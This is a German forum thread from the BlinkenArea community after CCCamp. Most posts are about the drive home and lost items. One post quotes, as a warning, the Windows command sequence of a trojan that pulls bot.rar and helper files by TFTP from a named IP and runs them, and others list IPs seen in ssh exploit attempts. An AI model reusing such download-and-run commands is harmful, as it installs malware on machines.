Life after CCCamp ;)

Hier kann alles andere besprochen werden. Software, Treffen, oder Projekte wie Kippenlights, GroggyClock, usw.
Post Reply
Xyphro
BlinkenNewbie
BlinkenNewbie
Posts: 6
Joined: Mon Jul 14, 2003 9:13 pm
Location: Dinslaken
Contact:

Life after CCCamp ;)

Post by Xyphro »

Hallo zusammen!

Die Rückfahrt war echt heftig...

Erst sind wir auf der A10 geblitzt worden (20km/h drüber) und standen dann auf der A2 in einem Stau. Ein Auto brannte auf der A2 bei Magdeburg... 3 Stunden tat sich garnichts, dann sollten alle Autos auf der Bahn wenden und die nächste Ausfahrt runterfahren. Insgesamt 6 1/2 Stunden hat es gedauert, bis wir wieder auf der A2 waren um zu bemerken, dass die Sperrung längst wieder weg war...
Um 2:30 waren wir dann wieder Zuhause ;)

Weiss von euch jemand zufällig, wer die IP 81.161.134.174 hatte? Habe da einen netten Trojaner her, der sich von dieser IP installiert und wild in der Gegend rumgefunkt hat.

So hat sich das Teil installiert:
-------------8<-------------8<-------------8<-------------8<-------------
mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
TFTP -i 81.161.134.174 GET bot.rar
TFTP -i 81.161.134.174 GET unrar.bat
TFTP -i 81.161.134.174 GET unrar.exe
start unrar.bat
exit
-------------8<-------------8<-------------8<-------------8<-------------

Im Taskmanager war das ganze als winole.exe und sfind.exe sichtbar.

Nur zur Info, falls sich noch jemand anderes das Teil "eingefangen" hat.

viele Grüsse,

Kai
cavac

Re: Life after CCCamp ;)

Post by cavac »

Xyphro wrote:Hallo zusammen!

Die Rückfahrt war echt heftig...
Wem sagst du das? Vor uns hatte sich auf der A9 ein LKW mal schnell quer auf der Strasse schlafengelegt. 2 Stunden warten, 20-25 Baustellen ind Deutschland, und ~80 km noch nicht fertig gebastelte Autubahn in Österreich...
Xyphro wrote: Weiss von euch jemand zufällig, wer die IP 81.161.134.174 hatte? Habe da einen netten Trojaner her, der sich von dieser IP installiert und wild in der Gegend rumgefunkt hat.
Kai
War auf jeden Fall einer aus der BlinkenArea. Da hatte ich einen Fix-Peer drauf. 1stein hatte Linux, die Kollegen im Zelt nebenan einen DynPeer. Wäre eigentlich nur das Haus oder die BlinkenBoardler, die in Frage kommen. (174 war zwar meiner Einschätzung nach deiner, aber der Virus wird sich wohl nicht von deinem Rechner aus wieder auf deinen installiert haben).

LLAP & LG
Rene
cavac

Email-Adressen

Post by cavac »

Bitte schickt mit doch ein kurzes Mail an
"cavac AT grumpfzotz.org"
damit ich eure Mailadressen habe
User avatar
stefan
Blinkenizer
Blinkenizer
Posts: 234
Joined: Wed Oct 09, 2002 9:45 pm
Location: Aachen
Contact:

Post by stefan »

Ohje, da haben wir ja richtig Glück mit der Rückahrt gehabt... Lief' eigentlich alles glatt...

Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy. Ich habe dafür einen Seitenschneider mit roten Griffen, einen roten Schlitz-Schraubendreher mit gelbem Muster auf dem Griff und einen roten STADA-Kugelschreiber mitgenommen, da diese Sachen nachher noch irgendwie da waren. Das können wir dann ja beim Kongress zurücktauschen.

folgende IPs konnte ich (aus meinen Logfiles) zuordnen:

1stein's Notebook: 81.161.150.32, 81.161.150.75, 81.161.189.187
BLINKENmini-Rechner: 81.161.134.172
cavac's Rechner: 81.161.135.147
BastelWastel: 81.161.135.160
versuchte Exploits auf meinen ssh-port: 81.161.135.227, 81.161.134.237, 81.161.134.57, 81.161.148.185

Mehr Infos habe ich leider nicht.

Gruß,
1stein
Poledra

Post by Poledra »

Hmm ich habe bisher nichts gefunden, dass nicht mir gehört ;) Sorry ;( Sollte ich noch etwas finden melde ich mich. Hätte ich das Handy gehabt wäre es mir schon aufgefallen, ein Messer auch!

Ich hoffe Ihr findet es noch!

Liebe Grüße Ina

PS: Kai hat auch nichts gefunden und meint, dass er auch seine Seitenschneider habe ...
cavac

Auch hier "fundsachen"

Post by cavac »

[quote="1stein"]Ohje, da haben wir ja richtig Glück mit der Rückahrt gehabt... Lief' eigentlich alles glatt...

Ein paar Sachen sind aber wohl am falschen Ort gelandet, Ich vermisse eins meiner Messer und sphaera vermisst ihr Handy.

Ich hätte hier Kai's Feuerzeug zum anbieten, ist aber schon leergeraucht :-)

Ansonsten schauts bei mir ziemlich OK aus; falls jemand ein Kaltgeräte-Stromkabel o.ä. vermisst: Ich hatte eine Menge mitgenommen und eine Menge zurückgebracht, jedoch nicht gezählt...

LLAP & LG
Rene
Post Reply